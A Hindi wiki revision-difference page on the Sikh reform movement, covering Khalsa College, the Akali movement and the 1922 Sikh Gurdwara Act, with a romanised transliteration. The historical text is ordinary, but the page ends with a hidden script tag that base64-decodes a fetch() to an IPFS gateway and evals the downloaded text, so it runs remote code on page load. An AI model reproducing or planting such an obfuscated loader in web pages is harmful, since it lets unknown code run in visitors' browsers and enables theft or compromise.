Difference between revisions of "सिक्ख सुधार आन्दोलन"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "शुरु " to "शुरू ")
 
Line 1: Line 1:
*'''सिक्ख सुधार आन्दोलन''' की शुरुआत 19वीं शताब्दी में [[अमृतसर]] में ‘खालसा कॉलेज’ की स्थापना की साथ हुई थी।
+
'''सिक्ख सुधार आन्दोलन''' की शुरुआत 19वीं [[शताब्दी]] में [[अमृतसर]] में ‘खालसा कॉलेज’ की स्थापना की साथ हुई थी।
 
*‘खालसा दीवान’ के नाम से भी प्रसिद्ध इस संस्था ने [[पंजाब]] में अनेक गुरुद्वारों एवं स्कूल-कॉलेजों की स्थापना की।
 
*‘खालसा दीवान’ के नाम से भी प्रसिद्ध इस संस्था ने [[पंजाब]] में अनेक गुरुद्वारों एवं स्कूल-कॉलेजों की स्थापना की।
*1920 ई. में स्थापित ‘अकाली आंदोलन’ ने गुरुद्वारों में प्रबंध सुधार के लिए महन्तों के ख़िलाफ़ अहिंसात्मक असहयोग सत्याग्रह आन्दोलन शुरू किया।
+
*[[1920]] ई. में स्थापित ‘अकाली आंदोलन’ ने गुरुद्वारों में प्रबंध सुधार के लिए महन्तों के ख़िलाफ़ अहिंसात्मक असहयोग सत्याग्रह आन्दोलन शुरू किया।
 
*पहले कम्पनी सरकार ने इस आन्दोलन को कुचलना चाहा, पर आन्दोलन की प्रचण्डता ने सरकार को झुकने के लिए मजबूर कर दिया।
 
*पहले कम्पनी सरकार ने इस आन्दोलन को कुचलना चाहा, पर आन्दोलन की प्रचण्डता ने सरकार को झुकने के लिए मजबूर कर दिया।
*1922 ई. में 'सिक्ख गुरुद्वारा अधिनियम' पास हुआ और 1925 ई. में अधिनियम को संशोधित किया गया।
+
*[[1922]] ई. में 'सिक्ख गुरुद्वारा अधिनियम' पास हुआ और [[1925]] ई. में अधिनियम को संशोधित किया गया।
 
*[[सिक्ख]] समुदाय में सुधार आन्दोलन के प्रेरक 'दयाल साहिब' थे।
 
*[[सिक्ख]] समुदाय में सुधार आन्दोलन के प्रेरक 'दयाल साहिब' थे।
 
*यह आन्दोलन [[सिक्ख धर्म]] में प्रचलित [[हिन्दू]] रीति-रिवाजों को हटाने के लिए चलाया गया था।
 
*यह आन्दोलन [[सिक्ख धर्म]] में प्रचलित [[हिन्दू]] रीति-रिवाजों को हटाने के लिए चलाया गया था।

Latest revision as of 10:45, 17 April 2012

sikkh sudhar andolan ki shuruat 19vian shatabdi mean amritasar mean ‘khalasa k aaulej’ ki sthapana ki sath huee thi.

  • ‘khalasa divan’ ke nam se bhi prasiddh is sanstha ne panjab mean anek gurudvaroan evan skool-k aaulejoan ki sthapana ki.
  • 1920 ee. mean sthapit ‘akali aandolan’ ne gurudvaroan mean prabandh sudhar ke lie mahantoan ke khilaf ahiansatmak asahayog satyagrah andolan shuroo kiya.
  • pahale kampani sarakar ne is andolan ko kuchalana chaha, par andolan ki prachandata ne sarakar ko jhukane ke lie majaboor kar diya.
  • 1922 ee. mean 'sikkh gurudvara adhiniyam' pas hua aur 1925 ee. mean adhiniyam ko sanshodhit kiya gaya.
  • sikkh samuday mean sudhar andolan ke prerak 'dayal sahib' the.
  • yah andolan sikkh dharm mean prachalit hindoo riti-rivajoan ko hatane ke lie chalaya gaya tha.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>